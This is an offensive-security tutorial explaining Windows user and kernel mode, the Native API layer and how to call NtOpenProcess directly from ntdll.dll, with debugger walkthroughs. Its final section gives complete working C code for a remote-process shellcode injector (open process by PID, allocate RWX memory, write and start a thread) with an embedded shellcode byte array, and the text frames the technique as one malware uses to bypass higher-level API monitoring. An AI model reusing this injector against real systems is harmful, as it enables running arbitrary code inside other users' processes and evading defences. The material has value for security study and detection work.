NTAPI Injection
In this documentation, we will explore NTAPI Injection.
User Mode and Kernel Mode
Before we get into the technique, we need to understand some basic things and let’s take a look at what are User-Mode and Kernel-Mode.

The Windows operating system basically offers two different rings: user mode and kernel mode. This distinction is based on the security of the operating system, the organization of its operation and the efficient use of resources. Both fields play different roles and complement each other.
User Mode (Ring 3)
User mode is an field reserved for applications and processes running in the operating system. Processes running in this mode do not have direct access to system resources and hardware. Instead, they make calls to kernel components of the operating system that run in kernel mode. These calls are usually made through WinAPI and, at a lower level, NTAPI, which is our main topic. Other features of the user mode:
- It provides a secure field where user applications run.
- In case of a crash, it only affects the application in question, not the whole system.
- It needs to switch to kernel mode for hardware access.
Kernel Mode (Ring 0)
Kernel mode is where the kernel of the operating system and the components that communicate directly with the hardware run. Drivers running in this mode have full control over the system, meaning they have more privileges and power than in user-mode. However, with this power comes great responsibility: Errors in kernel mode can affect the entire system and cause it to crash. Other features of kernel mode space:
- Direct access to hardware and system resources.
- It is a less isolated environment in terms of security measures and fault tolerance.
- It is the level where NTAPI calls are processed and executed.
What is Native API?
If you have followed my previous DLL Injection and Shellcode Execution documentations, you can remember that in these techniques we usually use WinAPI functions to execute our code. However, WinAPI represents a more user-friendly layer of the Windows operating system and is based on NTAPI (Native API).
NTAPI is a lightweight, low-level programming interface used by both kernel mode and user mode applications of Windows. The background operation of WinAPI relies heavily on NTAPI. For example, many subroutines that perform WinAPI functions use NTAPI calls through libraries such as kernel32.dll.
Let’s create a scenario to get a better picture. Let’s say we call OpenProcess from the user mode program. The operations shown in the diagram below will take place:

When we take a look at our diagram, we see that the OpenProcess API called by the User mode program is first directed to the kernel32.dll library and now when it is directed to the ntdll.dll library, which is the last stop of this mode, it turns into NtOpenProcess. ntdll.dll library is the last stop for the user-mode field and the next flow will continue in the kernel field.
I don’t want to confuse you too much by explaining SSDT here because it is a bit advanced and confusing. However, you can think of it as follows to keep it in your head: SSDT (System Service Descriptor Table) acts as a bridge to direct system calls from user mode to the correct APIs in kernel mode. This table takes the called Native APIs and redirects them to the corresponding addresses in ntoskrnl.exe in kernel mode. If you want to know more about SSDT, you can check my documentation about SSDT.
After the SSDT table, we can see that the operations are completed by redirecting to the address of NtOpenProcess in ntoskrnl.exe.
It is also possible to see this live. Let’s create a project in Visual Studio where we just call OpenProcess and then analyze it in Windbg to see what it turns out:

When we put a breakpoint on ntdll.dll, which is the last stop in the user-mode field, and run the program, we can see that KERNELBASE!OpenProcess is called first and then ntdll!NtOpenProcess is called. After ntdll.dll, the flow will continue in the kernel.
What is NTAPI Injection?
The NTAPI Injection technique involves directly interacting with the Windows Native API provided by ntdll.dll. This means that a malware that exploits this technique uses lower levels of ntdll.dll instead of higher level Windows APIs. For example, the malware does not call OpenProcess, but directly calls the lower level NtOpenProcess.
Let’s do some simple coding to understand the technique more closely. Let’s see how to call an NTAPI directly from ntdll.dll from the user-mode program. Our example will be NtOpenProcess.
First of all, we need to prepare before coding. Since we will directly call lower level APIs and they are not defined for user-mode fields, we will need to define them ourselves and then call them by getting their address.
We can use sites like NtDoc, which I often use, to create the relevant NTAPI:

We can access the structure by searching for the NTAPI you want to use in your project. Since our goal is to call NtOpenProcess in the project, let’s search for it:

As we can see the NtOpenProcess API takes four parameters:
NTSYSCALLAPI
NTSTATUS
NTAPI
NtOpenProcess(
_Out_ PHANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ PCOBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ PCLIENT_ID ClientId
);
If you remember, the OpenProcess function takes three parameters while its sub-level NtOpenProcess takes four. It also has two different parameters compared to OpenProcess.
Now let’s add this structure to our project:

When we add the structure to our project, you will see that it gives an error for the last two structures. Since these are not defined for the usermode field, we will need to define these structures from sites like ntdoc. We can add the structures by searching for CLIENT_ID and OBJECT_ATTRIBUTES on the site:

After these two structures, define the other structures that you get errors by searching from the site.
Finally, we will need to define NTSTATUS before we start coding. Since the return address of NTAPIs is of the type we call NTSTATUS, we will also define it and see if it is successful according to NTSTATUS values:
typedef _Return_type_success_(return >= 0) long NTSTATUS;
Let’s add this to our project. Now we can move on to coding:
#include <stdio.h>
#include <Windows.h>
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
_Field_size_bytes_part_opt_(MaximumLength, Length) PWCH Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PCUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor; // PSECURITY_DESCRIPTOR;
PVOID SecurityQualityOfService; // PSECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef NTSTATUS(NTAPI* NtOpenProcess)(
PHANDLE ProcessHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PCLIENT_ID ClientId
);
int main(int argc, char* argv[]) {
if (argc < 2) {
printf("Kullanim: program.exe <PID>\n");
return -1;
}
DWORD PID = atoi(argv[1]);
HMODULE NTDLL = GetModuleHandleW(L"ntdll.dll");
if (NTDLL == NULL) {
printf("NTDLL'in adresi alinamadi!\n");
return -1;
}
printf("NTDLL adresi: 0x%p\n", NTDLL);
NtOpenProcess NtOpenProcessAddress = (NtOpenProcess)GetProcAddress(NTDLL, "NtOpenProcess");
if (NtOpenProcessAddress == NULL) {
printf("NtOpenProcess adresi alinamadi!\n");
return -1;
}
printf("NtOpenProcess adresi: 0x%p\n", NtOpenProcessAddress);
HANDLE HandleProcess = NULL;
OBJECT_ATTRIBUTES ObjAttr = { sizeof(ObjAttr), NULL };
CLIENT_ID CID = { (HANDLE)PID, NULL };
NTSTATUS Status = NtOpenProcessAddress(&HandleProcess, PROCESS_ALL_ACCESS, &ObjAttr, &CID);
if (Status != 0) {
printf("NtOpenProcess fonksiyonu basarisiz oldu! Status: 0x%08x\n", Status);
return -1;
}
printf("NtOpenProcess fonksiyonu basarili!\n");
return 0;
}
Let’s take a detailed look:
HMODULE NTDLL = GetModuleHandleW(L"ntdll.dll");
if (NTDLL == NULL) {
printf("NTDLL'in adresi alinamadi!\n");
return -1;
}
printf("NTDLL adresi: 0x%p\n", NTDLL);
In main, we first start by getting the address of ntdll.dll. After getting the address of ntdll, we will reach the address of NtOpenProcess from this library.
NtOpenProcess NtOpenProcessAddress = (NtOpenProcess)GetProcAddress(NTDLL, "NtOpenProcess");
if (NtOpenProcessAddress == NULL) {
printf("NtOpenProcess adresi alinamadi!\n");
return -1;
}
printf("NtOpenProcess adresi: 0x%p\n", NtOpenProcessAddress);
After getting the address of ntdll, we get the address of NtOpenProcess from ntdll with GetProcAddress and give this address to the NtOpenProcess structure we created in the project.
HANDLE HandleProcess = NULL;
OBJECT_ATTRIBUTES ObjAttr = { sizeof(ObjAttr), NULL };
CLIENT_ID CID = { (HANDLE)PID, NULL };
NTSTATUS Status = NtOpenProcessAddress(&HandleProcess, PROCESS_ALL_ACCESS, &ObjAttr, &CID);
if (Status != 0) {
printf("NtOpenProcess fonksiyonu basarisiz oldu! Status: 0x%08x\n", Status);
return -1;
}
printf("NtOpenProcess fonksiyonu basarili!\n");
Finally, we call NtOpenProcess. But before that we define the OBJECT_ATTRIBUTES and CLIENT_ID structures.
Note that while in OpenProcess the PID value is given directly with a DWORD, NtOpenProcess does not take the PID value directly and gives it to UniqueProcess, which is the first element of CLIENT_ID and of type HANDLE.
Let’s keep an eye on the if condition in this section. Compared to user mode WinAPIs, NTAPIs that return results of type NTSTATUS, if it returns 0, it indicates success. Therefore, if the condition returns a value other than 0, we print the error status on the screen.
Instead of running the program directly and seeing the result, let’s analyze it in more detail and see what is happening in the background. Let’s give Windbg the .exe file we coded:

After pressing the Debug button, let’s put a bp in the main function and run it:

Let’s activate View > Dissassembly from the top of Windbg and take a look at the disassembly of the main function:

When looking at the main function, we can start by looking at the address of the ntdll we got with GetModuleHandeW. Let’s add a bp after GetModuleHandleW runs and see what value rax gets:

After GetModuleHandleW runs, we can verify that rax points to the start address of ntdll.dll.
Our next section will be to get the address of the NtOpenProcess with GetProcAddress:

In the same way, let’s add a bp in the section after GetProcAddress runs and take a look at the value rax gets:

As we can see, the execution of GetProcAddress yields the address 00007ffc7c6dfbd0 and when we check the address we can see that it is NtOpenProcess in ntdll.
Now let’s finally turn our focus to the point where we call NtOpenProcess:

In this section we can see that the parameters for NtOpenProcess are prepared and then it calls NtOpenProcess. However, I want you to notice one thing: the parameters are prepared upside down. If you look at the symbol names, you will see that first the CID structure is prepared and given to the r9 register and finally the address of the HandleProcess is given to the rcx register.
WIN32 APIs like OpenProcess use stdcall calling conventions. For a better understanding we can use the Microsoft Learn documentation:
The __stdcall calling convention is used to call Win32 API functions. The callee cleans the stack, so the compiler makes vararg functions __cdecl. Functions that use this calling convention require a function prototype. The __stdcall modifier is Microsoft-specific.
Since WIN32 APIs use the stdcall calling convention, parameters are prepared from right to left:

Let’s go back to our C code for a better understanding:
NTSTATUS Status = NtOpenProcessAddress(
&HandleProcess,
PROCESS_ALL_ACCESS,
&ObjAttr,
&CID
);
Although this is how we prepare the parameters of NtOpenProcess in the project, since OpenProcess is included in the stdcall rule, these parameters will be prepared from right to left in the background. So it is like this:
NTSTATUS Status = NtOpenProcessAddress(
&CID,
&ObjAttr,
PROCESS_ALL_ACCESS,
&HandleProcess
);
Again, you will see that registers such as r9 are prepared while preparing the parameters. These registers are not used randomly, again it is related to the x64 Calling Convention of Windows:
By default, the x64 calling convention passes the first four arguments to a function in registers. The registers used for these arguments depend on the position and type of the argument. Remaining arguments get pushed on the stack in right-to-left order. All arguments passed on the stack are 8-byte aligned.
The first four parameters of the function are passed to registers rcx, rdx, r8 and r9. If there are more than four parameters, the others are passed to the stack. If we turn to NtOpenProcess for a better understanding, it will be prepared as shown below:
NTSTATUS Status = NtOpenProcessAddress(
&HandleProcess, // rcx
PROCESS_ALL_ACCESS, // rdx
&ObjAttr, // r8
&CID // r9
);
We can also verify this if we look at the Disassembly screen again:

Let’s add a bp in main where we call NtOpenProcess and continue the program with p to see what NtOpenProcess returns:

NtOpenProcess returned 0 after running. Let’s remember what I said: Native APIs that return NTSTATUS type indicate success if they return 0.
Let’s make a diagram of the operations we did in the project:

If you remember from the first diagram, our first section was kernel32.dll, but in our project we skip this part and reach directly NtOpenProcess from ntdll.dll in the program.
Injecting Shellcode with NTAPI
Now we know what we are doing in the NTAPI Injection technique. We will do the same steps as we did in our Shellcode Execution documentation, but differently we will use NTAPI.
First, let’s create utils.h header in the project and paste the following codes:
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#pragma once
#define STATUS_SUCCESS (NTSTATUS)0x00000000L
#pragma region STRUCTURES
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
VOID* RootDirectory;
struct _UNICODE_STRING* ObjectName;
ULONG Attributes;
VOID* SecurityDescriptor;
VOID* SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _PS_ATTRIBUTE {
ULONGLONG Attribute;
SIZE_T Size;
union {
ULONG_PTR Value;
PVOID ValuePtr;
};
PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;
typedef struct _PS_ATTRIBUTE_LIST
{
SIZE_T TotalLength;
PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef NTSTATUS(NTAPI* fn_NtOpenProcess) (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL
);
typedef NTSTATUS(NTAPI* fn_NtAllocateVirtualMemory) (
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN ULONG ZeroBits,
IN OUT PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
);
typedef NTSTATUS(NTAPI* fn_NtWriteVirtualMemory) (
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN SIZE_T NumberOfBytesToWrite,
OUT PSIZE_T NumberOfBytesWritten OPTIONAL
);
typedef NTSTATUS(NTAPI* fn_NtCreateThreadEx) (
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument OPTIONAL,
IN ULONG CreateFlags,
IN SIZE_T ZeroBits,
IN SIZE_T StackSize,
IN SIZE_T MaximumStackSize,
IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL
);
typedef NTSTATUS(NTAPI* fn_NtWaitForSingleObject) (
_In_ HANDLE Handle,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout
);
typedef NTSTATUS(NTAPI* fn_NtClose) (
IN HANDLE Handle
);
#pragma endregion
Ve main.c projesini kodlayalım:
#include "utils.h"
/*
cmd.exe /K "echo NTAPI Injection with bekoo"
*/
char Shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x4b\x20\x22\x65"
"\x63\x68\x6f\x20\x4e\x54\x41\x50\x49\x20\x49\x6e\x6a\x65"
"\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68\x20\x62\x65\x6b"
"\x6f\x6f\x22\x00";
size_t ShellcodeSize = sizeof(Shellcode);
int main(int argc, char* argv[]) {
if (argc < 2) {
printf("Usage: .\\injection.exe <PID>");
return -1;
}
DWORD PID = atoi(argv[1]);
HANDLE HandleProcess = NULL;
HANDLE HandleThread = NULL;
HMODULE ntDLL = NULL;
PVOID RemoteBuffer = NULL;
size_t bytesWritten = 0;
OBJECT_ATTRIBUTES objAttr = { sizeof(objAttr), NULL };
CLIENT_ID CID = { (HANDLE)PID, NULL };
NTSTATUS Status = STATUS_SUCCESS;
/* Get handle to ntdll and kernel32 */
ntDLL = GetModuleHandleA("ntdll.dll");
if (ntDLL == NULL) {
printf("Failed to get handle for NTDLL! Error Code: 0x%lx\n", GetLastError());
return -1;
}
/* NtCloseHandle */
fn_NtClose ntClose = (fn_NtClose)GetProcAddress(ntDLL, "NtClose");
/* NTOpenProcess */
fn_NtOpenProcess ntOpenProcess = (fn_NtOpenProcess)GetProcAddress(ntDLL, "NtOpenProcess");
Status = ntOpenProcess(&HandleProcess, PROCESS_ALL_ACCESS, &objAttr, &CID);
if (Status != STATUS_SUCCESS) {
printf("Failed to open handle to Process! Error Code: 0x%lx", Status);
return -1;
}
/* NTAllocateVirtualMemory */
fn_NtAllocateVirtualMemory ntAllocateVirtualMemory = (fn_NtAllocateVirtualMemory)GetProcAddress(ntDLL, "NtAllocateVirtualMemory");
Status = ntAllocateVirtualMemory(HandleProcess, &RemoteBuffer, 0, &ShellcodeSize, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
if (Status != STATUS_SUCCESS) {
printf("Failed to Allocate Memory in Process! Error Code: 0x%lx", Status);
ntClose(HandleProcess);
return -1;
}
/* NTWriteVirtualMemory */
fn_NtWriteVirtualMemory ntWriteVirtualMemory =
(fn_NtWriteVirtualMemory)GetProcAddress(ntDLL, "NtWriteVirtualMemory");
Status = ntWriteVirtualMemory(HandleProcess, RemoteBuffer, Shellcode, sizeof(Shellcode), &bytesWritten);
if (Status != STATUS_SUCCESS || bytesWritten != sizeof(Shellcode)) {
printf("Failed to Write Memory in Process! Error Code: 0x%lx", Status);
ntClose(HandleProcess);
return -1;
}
/* NtCreateThreadEx */
fn_NtCreateThreadEx ntCreateThreadEx =
(fn_NtCreateThreadEx)GetProcAddress(ntDLL, "NtCreateThreadEx");
Status = ntCreateThreadEx(&HandleThread, THREAD_ALL_ACCESS, &objAttr, HandleProcess, (RemoteBuffer), NULL, FALSE, 0, 0, 0, 0);
if (Status != STATUS_SUCCESS) {
printf("Failed to create Thread! Error Code: 0x%lx", Status);
ntClose(HandleProcess);
return -1;
}
/* NtWaitForSingleObject */
fn_NtWaitForSingleObject ntWaitForSingleObject =
(fn_NtWaitForSingleObject)GetProcAddress(ntDLL, "NtWaitForSingleObject");
Status = ntWaitForSingleObject(HandleThread, FALSE, NULL);
if (Status != STATUS_SUCCESS) {
printf("Failed to wait for Thread! Error Code: 0x%lx", Status);
ntClose(HandleThread);
ntClose(HandleProcess);
return -1;
}
ntClose(HandleThread);
ntClose(HandleProcess);
return 0;
}
Here’s result:
Conclusion
In this documentation we have looked closely at NTAPIs, we have theoretically introduced the User-mode and Kernel-mode fields, and then we have worked on NTAPIs and finally we executed Shellcode using NTAPIs.